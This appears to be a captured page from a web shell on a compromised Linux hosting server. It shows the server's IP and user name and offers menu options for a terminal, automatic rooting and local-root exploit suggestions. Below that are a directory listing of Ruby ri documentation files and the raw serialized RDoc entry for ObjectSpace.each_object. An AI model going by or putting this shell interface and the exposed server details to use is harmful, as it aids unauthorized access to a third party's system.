Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.45
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby32 /
share /
ri /
system /
ObjectSpace /
Delete
Unzip
Name
Size
Permission
Date
Action
InternalObjectWrapper
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
WeakMap
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
allocation_class_path-c.ri
809
B
-rw-r--r--
2026-04-07 17:42
allocation_generation-c.ri
871
B
-rw-r--r--
2026-04-07 17:42
allocation_method_id-c.ri
862
B
-rw-r--r--
2026-04-07 17:42
allocation_sourcefile-c.ri
533
B
-rw-r--r--
2026-04-07 17:42
allocation_sourceline-c.ri
545
B
-rw-r--r--
2026-04-07 17:42
cdesc-ObjectSpace.ri
3.16
KB
-rw-r--r--
2026-04-07 17:42
count_imemo_objects-c.ri
1.13
KB
-rw-r--r--
2026-04-07 17:42
count_nodes-c.ri
1020
B
-rw-r--r--
2026-04-07 17:42
count_objects-c.ri
1.28
KB
-rw-r--r--
2026-04-07 17:42
count_objects_size-c.ri
1.09
KB
-rw-r--r--
2026-04-07 17:42
count_symbols-c.ri
1.33
KB
-rw-r--r--
2026-04-07 17:42
count_tdata_objects-c.ri
1.54
KB
-rw-r--r--
2026-04-07 17:42
define_finalizer-c.ri
2.49
KB
-rw-r--r--
2026-04-07 17:42
dump-i.ri
834
B
-rw-r--r--
2026-04-07 17:42
dump_all-i.ri
2.3
KB
-rw-r--r--
2026-04-07 17:42
dump_shapes-i.ri
1.2
KB
-rw-r--r--
2026-04-07 17:42
each_object-c.ri
1.5
KB
-rw-r--r--
2026-04-07 17:42
garbage_collect-c.ri
309
B
-rw-r--r--
2026-04-07 17:42
garbage_collect-i.ri
308
B
-rw-r--r--
2026-04-07 17:42
internal_class_of-c.ri
679
B
-rw-r--r--
2026-04-07 17:42
internal_super_of-c.ri
703
B
-rw-r--r--
2026-04-07 17:42
memsize_of-c.ri
761
B
-rw-r--r--
2026-04-07 17:42
memsize_of_all-c.ri
1.21
KB
-rw-r--r--
2026-04-07 17:42
reachable_objects_from-c.ri
1.99
KB
-rw-r--r--
2026-04-07 17:42
reachable_objects_from_root-c.ri
535
B
-rw-r--r--
2026-04-07 17:42
trace_object_allocations-c.ri
1.13
KB
-rw-r--r--
2026-04-07 17:42
trace_object_allocations_clear-c.ri
413
B
-rw-r--r--
2026-04-07 17:42
trace_object_allocations_debug_start-c.ri
315
B
-rw-r--r--
2026-04-07 17:42
trace_object_allocations_start-c.ri
412
B
-rw-r--r--
2026-04-07 17:42
trace_object_allocations_stop-c.ri
598
B
-rw-r--r--
2026-04-07 17:42
undefine_finalizer-c.ri
374
B
-rw-r--r--
2026-04-07 17:42
Save
Rename
U:RDoc::AnyMethod[iI"each_object:ETI"ObjectSpace::each_object;TT:privateo:RDoc::Markup::Document:@parts[ o:RDoc::Markup::Paragraph; [I"GCalls the block once for each living, nonimmediate object in this ;TI"BRuby process. If <i>module</i> is specified, calls the block ;TI"Ifor only those classes or modules that match (or are a subclass of) ;TI"C<i>module</i>. Returns the number of objects found. Immediate ;TI"9objects (<code>Fixnum</code>s, <code>Symbol</code>s ;TI"F<code>true</code>, <code>false</code>, and <code>nil</code>) are ;TI"Enever returned. In the example below, #each_object returns both ;TI"Fthe numbers we defined and several constants defined in the Math ;TI"module.;To:RDoc::Markup::BlankLine o; ; [I"=If no block is given, an enumerator is returned instead.;T@o:RDoc::Markup::Verbatim; [ I"a = 102.7 ;TI"&b = 95 # Won't be returned ;TI"c = 12345678987654321 ;TI"9count = ObjectSpace.each_object(Numeric) {|x| p x } ;TI""puts "Total count: #{count}" ;T:@format0o; ; [I"<em>produces:</em>;T@o;; [ I"12345678987654321 ;TI"102.7 ;TI"2.71828182845905 ;TI"3.14159265358979 ;TI"2.22044604925031e-16 ;TI"1.7976931348623157e+308 ;TI"2.2250738585072e-308 ;TI"Total count: 7;T; 0: @fileI" gc.c;T:0@omit_headings_from_table_of_contents_below0I"ObjectSpace.each_object([module]) {|obj| ... } -> integer ObjectSpace.each_object([module]) -> an_enumerator ;T0[ I"(*args);T@.FI"ObjectSpace;TcRDoc::NormalModule00